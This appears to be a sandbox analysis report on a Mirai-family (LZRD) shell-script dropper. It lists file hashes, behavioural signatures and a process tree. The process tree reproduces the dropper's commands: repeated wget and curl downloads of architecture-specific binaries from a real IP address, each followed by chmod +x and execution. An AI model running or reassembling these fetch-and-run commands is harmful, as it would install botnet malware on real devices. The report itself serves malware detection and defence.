Analysis
-
max time kernel
139s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
23-12-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
-
Size
2KB
-
MD5
4e3d079076dbd0da4d36211e359e7c90
-
SHA1
c78fc85b3cb983b5f6da054337221b744ffce6f2
-
SHA256
21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c
-
SHA512
85a322f9c2d9cae35021d896ca50f254b49354d2819f77396a97a9d41a544d8662ec0cdd38475884b9bab02f9247c9ed637fa9caa26d4669b8f5e32a739ec78b
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1559 chmod 1609 chmod 1537 chmod 1527 chmod 1549 chmod 1569 chmod 1579 chmod 1589 chmod 1501 chmod 1619 chmod 1517 chmod 1599 chmod 1629 chmod 1639 chmod 1507 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 1502 Space /tmp/Space 1508 Space /tmp/Space 1518 Space /tmp/Space 1528 Space /tmp/Space 1538 Space /tmp/Space 1550 Space /tmp/Space 1560 Space /tmp/Space 1570 Space /tmp/Space 1580 Space /tmp/Space 1590 Space /tmp/Space 1600 Space /tmp/Space 1610 Space /tmp/Space 1620 Space /tmp/Space 1630 Space /tmp/Space 1640 Space -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 28 IoCs
description ioc Process File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space -
resource yara_rule behavioral1/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/17/status Space File opened for reading /proc/1511/status Space File opened for reading /proc/89/status Space File opened for reading /proc/409/status Space File opened for reading /proc/1080/status Space File opened for reading /proc/1093/status Space File opened for reading /proc/322/status Space File opened for reading /proc/22/status Space File opened for reading /proc/11/status Space File opened for reading /proc/513/status Space File opened for reading /proc/1141/status Space File opened for reading /proc/17/status Space File opened for reading /proc/28/status Space File opened for reading /proc/82/status Space File opened for reading /proc/98/status Space File opened for reading /proc/176/status Space File opened for reading /proc/1169/status Space File opened for reading /proc/32/status Space File opened for reading /proc/171/status Space File opened for reading /proc/1585/status Space File opened for reading /proc/16/status Space File opened for reading /proc/1060/status Space File opened for reading /proc/1267/status Space File opened for reading /proc/514/status Space File opened for reading /proc/412/status Space File opened for reading /proc/440/status Space File opened for reading /proc/1334/status Space File opened for reading /proc/1302/status Space File opened for reading /proc/1144/status Space File opened for reading /proc/3/status Space File opened for reading /proc/1188/status Space File opened for reading /proc/1070/status Space File opened for reading /proc/180/status Space File opened for reading /proc/457/status Space File opened for reading /proc/1513/status Space File opened for reading /proc/24/status Space File opened for reading /proc/1179/status Space File opened for reading /proc/1188/status Space File opened for reading /proc/36/status Space File opened for reading /proc/1488/status Space File opened for reading /proc/85/status Space File opened for reading /proc/970/status Space File opened for reading /proc/13/status Space File opened for reading /proc/167/status Space File opened for reading /proc/1109/status Space File opened for reading /proc/1306/status Space File opened for reading /proc/24/status Space File opened for reading /proc/21/status Space File opened for reading /proc/676/status Space File opened for reading /proc/7/status Space File opened for reading /proc/458/status Space File opened for reading /proc/1486/status Space File opened for reading /proc/1513/status Space File opened for reading /proc/26/status Space File opened for reading /proc/1302/status Space File opened for reading /proc/81/status Space File opened for reading /proc/1591/status Space File opened for reading /proc/10/status Space File opened for reading /proc/1601/status Space File opened for reading /proc/458/status Space File opened for reading /proc/176/status Space File opened for reading /proc/32/status Space File opened for reading /proc/1070/status Space File opened for reading /proc/1580/status Space -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1534 wget 1535 curl 1546 wget 1547 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.arm6 wget File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.arm5 curl File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.sparc curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space.m68k curl File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.sh4 curl File opened for modification /tmp/Space.i686 wget
Processes
-
/tmp/21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh/tmp/21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh1⤵
- Writes file to tmp directory
PID:1492 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:1493
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1494
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/catcat Space.arc2⤵PID:1500
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-A9L7FZ2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:1502
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1504
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/catcat Space.x862⤵PID:1506
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.x86 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-A9L7FZ2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1508
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1514
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-A9L7FZ2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1518
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1524
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-A9L7FZ2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1528
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1534
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1535
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-A9L7FZ2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1538
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:1546
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1547
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1550
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1556
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1560
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1566
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1570
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1576
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1580
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1586
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1590
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1596
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1600
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1606
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1610
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.sparc2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.sparc2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1620
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1626
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1630
-
-
/usr/bin/wgetwget http://89.213.158.208/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1636
-
-
/usr/bin/curlcurl -O http://89.213.158.208/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/chmodchmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1640
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5f66071f9e603dd7b96793058e206b45c
SHA1f90eaf59e5a2c5030450de5b1f12a72a8ec8f256
SHA2568b8facc7fb2d6cd6f278ea77711c41970dcdff8a367d2d04a2221fd4286ffb45
SHA512d5d307f49f255d8f2e36027cdb5b0b7171f83d99147fb1d074bdb64f4c65fa19a7af2556508e0a317a9a4e0df5bd005b5d1b3396282647d9672b12d916d3fc88
-
Filesize
113KB
MD50d7dfd4bb7805b98857a7d2f0a6c736e
SHA13dd2688150dae67b47e3a4da289f98f2fc6b3dae
SHA256fc713acedb272a695f5377591a7110d2061697ef7b5de6852e1132040597a39b
SHA51203858c754d6469066b8b7b21f8765c24706209e0d9acc3b014014c5a6abd8738f4722d6f2403f85678822021b568834186c6e346dd96b25139c7e4572d3c1899
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6